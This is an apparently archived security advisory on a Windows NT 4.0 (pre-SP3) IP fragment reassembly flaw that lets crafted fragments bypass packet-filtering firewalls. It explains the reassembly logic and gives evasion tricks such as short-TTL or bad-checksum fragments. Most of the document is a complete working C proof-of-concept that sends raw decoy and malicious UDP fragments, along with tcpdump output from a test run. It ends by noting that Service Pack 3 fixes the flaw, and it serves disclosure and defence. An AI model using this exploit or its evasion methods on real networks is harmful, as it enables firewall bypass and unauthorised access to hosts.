COMMAND
fragmentation attack
SYSTEMS AFFECTED
Win NT 4.0
PROBLEM
Thomas Lopatic found following. Windows NT 4.0 (up to Service
Pack 2) hosts which are protected by a packet filtering firewall
are vulnerable to a new kind of fragmentation attack. Details are
taken from http://www.dataprotect.com/ntfrag/
The attack affects Windows NT 4.0 hosts (up to and including
Service Pack 2) that are protected by a firewall which is based
on packet screening. Stateful inspection firewalls may also be
concerned, depending on their implementation. Using this
weakness, an outsider is able to pass IP datagrams through the
firewall to the Windows NT host, i.e. access the host as if the
firewall did not exist.
When reassembling a fragmented IP packet, the Microsoft
implementation does not require the first fragment to have an
offset value of zero. It merely checks, whether the sum of the
lengths of the collected fragments equals the total length of the
original unfragmented IP packet. If enough fragments have been
received so that this condition holds, the NT stack will happily
reassemble what it has got so far.
So - how does it know about the total length of the original
packet? Since, during normal operation, all fragments but the
last have the MF (more fragments) bit set, Microsoft's stack
waits until it has received a fragment F without the MF bit and
then reasons that the length of the unfragmented datagram must
have been offset of F + length of F. Apparently Microsoft have
tried to be particularly efficient since this method is faster
than traversing the whole list of fragments to check for
completeness.
Thomas illustrated this mechanism with an example. Say that we
have an original packet of 48 bytes which we send as three
fragments F1, F2 and F3, each with a length of 16 bytes. Now
suppose that they arrive out of order, first F2, then F3 and
eventually F1. The following table shows NT's notion of the
total packet length after each fragment has arrived.
Fragment #Offset Length MF bit Total Length Data Collected
F2 16 16 1 0 (no change, since MF 16 = 1) 16
F3 32 16 0 48 (= offset + length = 32 + 16) 32
F1 0 16 1 48 (no change, since MF = 1) 48
After Total Length equals Data Collected, the IP stack decides
that it has received all fragments and starts reassembling. To
exploit this goodie courtesy of Microsoft, we will clear the MF
bit on another fragment. Suppose we send another two fragments
F1, and F2 as follows.
Fragment #Offset Length MF bit Total Length Data Collected
F1 16 16 0 32 16 (= offset + length = 16 + 16)
F2 32 16 1 32 (MF = 1, no change)
We have just sent two fragments, none of which has an offset of
zero, yet the NT protocol stack will correctly reassemble them
into a 32 byte IP packet.
Exploiting this feature is a bit more complicated than it seems at
first sight. Since the IP stack stores the IP header of a
fragment (to use it later for the reassembled packet) if and only
if its offset is zero, we must send a decoy packet first, which
must be carefully crafted so that it will be stored at exactly
the same memory location as our next packet, which is the
malicious one without the zero-offset-fragment. So, the bogus
datagram will reuse the header information of our first datagram.
Imagine that we would like to attack a WWW server behind a
firewall. Then we would send one decoy to port 80, a malicious
packet to 23, another decoy to port 80, another bogus packet to
port 23, etc. In this way we can establish a telnet session
through the packet screen.
But what do we do when we hit a packet screen (e.g. screend) which
requires for each fragmented packet a fragment with an offset of
zero to be present? We send such a fragment and simply give it a
time to live that is short enough so that it will reach the
firewall but never the destination host. Another option would be
to insert an invalid checksum into its IP header so that it will
be dropped at the destination host.
In order to back up the above theory with an example, Thomas has
written a short program which sends a decoy UDP datagram to port
9 (discard) of his NT system and after that another UDP datagram
to port 7 (echo). He used port 255 as the source port. The
program runs on NetBSD 1.2 and should be easily portable to any
BSD system featuring the Berkeley Packet Filter. Here is the
output of tcpdump after an example run.
bob:/usr/home/tl# tcpdump
tcpdump: listening on ed0
01:54:38.751853 bob.255 > alice.discard: udp 248 (frag 256:256@0+)
01:54:38.752252 bob > alice: (frag 256:256@256)
01:54:38.752645 bob > alice: (frag 512:256@256)
01:54:38.753054 bob > alice: (frag 512:256@512+)
01:54:38.755716 alice.echo > bob.255: udp 248
01:54:38.755992 bob > alice: icmp: bob udp port 255 unreachable
^C
6 packets received by filter
0 packets dropped by kernel
bob:/usr/home/tl#
As can be easily seen, responds (line seven in the above
paragraph) to the two fragments sent by bob (lines five and six
in the above paragraph). The first two fragments (lines three and
four) make up the decoy packet. Eventually, alice gets an ICMP
message, since bob does not have any service listening at port
255. The source code for this little demo program is available
below.
/*
This programs demonstrates a new kind of fragmentation attack
involving Windows NT 4.0 hosts behind packet filtering firewalls.
See http://www.dataprotect.com/ntfrag/ for details on this attack.
It should compile cleanly on any BSD system which has the Berkeley
Packet Filter installed and has been tested on NetBSD 1.2 against
a Windows NT 4.0 (SP2) host.
OpenBSD patches provided by Theo de Raadt <deraadt@cvs.openbsd.org>
SERVICE PACK 3 FIXES THIS PROBLEM! INSTALL IT - NOW!
Thomas Lopatic (thomas@dataprotect.com), 970709
*/
#include <sys/types.h>
#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/errno.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <net/bpf.h>
#include <net/if.h>
#include <stdlib.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <string.h>
#include <unistd.h>
char bpf_dev[] = "/dev/bpf1"; /* the BPF device to use */
char inter[] = "ed0"; /* the ethernet device we'll attach to */
char src[] = "172.16.0.2"; /* our address */
char dest[] = "172.16.0.1"; /* the target system's address */
int sport = 255; /* the source port for the UDP datagram */
int dport = 9; /* the decoy destination port */
int real_dport = 7; /* the real destination port */
u_short calc_sum(u_short start, u_short *buff, int len)
{
u_long sum = start;
while (len--)
sum += *buff++;
sum = (sum >> 16) + (sum & 0xffff);
sum = (sum >> 16) + (sum & 0xffff);
return sum;
}
void dump_hex(u_char *buffer, int size)
{
int i, off = 0;
while (off < size) {
printf("%.4x:", off);
for (i = 0; i < 16 && i + off < size; i++)
printf(" %.2x", buffer[i + off]);
printf("\n");
off += i;
}
}
int main(int ac, char *av[])
{
int i, s, k, bpf, res = 0, true = 1;
unsigned char dgram[276];
union {
unsigned long l[3];
unsigned short s[6];
unsigned char c[12];
} pseudo;
struct ip *iph;
struct udphdr *udph;
struct sockaddr_in daddr;
struct timeval to = {0, 500000};
int blen;
u_char *bbuff;
struct ifreq req;
struct bpf_hdr *bhdr;
if (getuid()) {
printf("you must be root to use this program\n");
return 12;
}
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
res = 1;
} else {
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
perror("setsockopt");
res = 2;
} else if ((bpf = open(bpf_dev, O_RDWR)) < 0) {
perror("open");
res = 3;
} else {
if (ioctl(bpf, BIOCGBLEN, &blen) < 0) {
perror("ioctl(BIOCGBLEN)");
res = 4;
} else if ((bbuff = malloc(blen)) == NULL) {
perror("malloc");
res = 5;
} else {
strcpy(req.ifr_name, inter);
if (ioctl(bpf, BIOCSETIF, &req) < 0) {
perror("ioctl(BIOSETIF)");
res = 6;
} else if (ioctl(bpf, BIOCSRTIMEOUT, &to) < 0) {
perror("ioctl(BIOCSRTIMEOUT)");
res = 7;
} else {
daddr.sin_len = sizeof(daddr);
daddr.sin_family = AF_INET;
daddr.sin_port = dport;
daddr.sin_addr.s_addr = inet_addr(dest);
for (i = 0; i < sizeof(dgram); dgram[i++] = 0);
for (i = 0; i < 3; pseudo.l[i++] = 0);
iph = (struct ip *)&dgram[0];
udph = (struct udphdr *)&dgram[20];
iph->ip_v = IPVERSION;
iph->ip_hl = 5;
#ifdef __OpenBSD__
iph->ip_len = htons(276);
#else
iph->ip_len = 276;
#endif
iph->ip_id = 1;
iph->ip_ttl = 255;
iph->ip_p = pseudo.c[9] = IPPROTO_UDP;
iph->ip_src.s_addr = pseudo.l[0] = inet_addr(src);
iph->ip_dst.s_addr = pseudo.l[1] = inet_addr(dest);
/*
offset = 0, length = 256, MF = 1
-> total length is not affected by this fragment
*/
#ifdef __OpenBSD__
iph->ip_off = htons(0x2000);
#else
iph->ip_off = 0x2000;
#endif
iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
udph->uh_sport = ntohs(sport);
udph->uh_dport = ntohs(dport);
udph->uh_ulen = pseudo.s[5] = ntohs(256);
udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,128);
/* send the first half of the decoy */
if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
sizeof(daddr)) < 0) {
perror("sendto");
res = 8;
}
/*
offset = 256, length = 256, MF = 0
-> total length is set to 512 by this fragment
*/
#ifdef __OpenBSD__
iph->ip_off = htons(32);
#else
iph->ip_off = 32;
#endif
iph->ip_sum = 0;
iph->ip_sum = calc_sum(0, (u_short *)iph, 10);
for (i = 20; i < 276; dgram[i++] = 0);
/* send the second half of the decoy */
if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
sizeof(daddr)) < 0) {
perror("sendto");
res = 9;
}
iph->ip_id++;
iph->ip_sum = 0;
iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
udph->uh_sport = ntohs(sport);
udph->uh_dport = ntohs(real_dport);
udph->uh_ulen = pseudo.s[5] = ntohs(256);
udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,128);
/*
send the first half of the real datagram
we have kept the offset settings from above
offset = 256, length = 256, MF = 0
-> total length is set to 512 by this fragment
*/
if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
sizeof(daddr)) < 0) {
perror("sendto");
res = 10;
}
/*
offset = 512, length = 256, MF = 1
-> total length is not affected
*/
#ifdef __OpenBSD__
iph->ip_off = htons(0x2040);
#else
iph->ip_off = 0x2040;
#endif
iph->ip_sum = 0;
iph->ip_sum = calc_sum(0, (u_short *)iph, 10);
for (i = 20; i < 276; dgram[i++] = 0);
/* send the second half of the real datagram */
if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
sizeof(daddr)) < 0) {
perror("sendto");
res = 11;
}
}
free(bbuff);
}
close(bpf);
}
close(s);
}
return res;
}
SOLUTION
This problem has been fixed in SP3. This Service Pack fixes the
problem mentioned above. It introduces a check, whether the IP
stack has seen a fragment with an offset of zero, before
reassembly is done.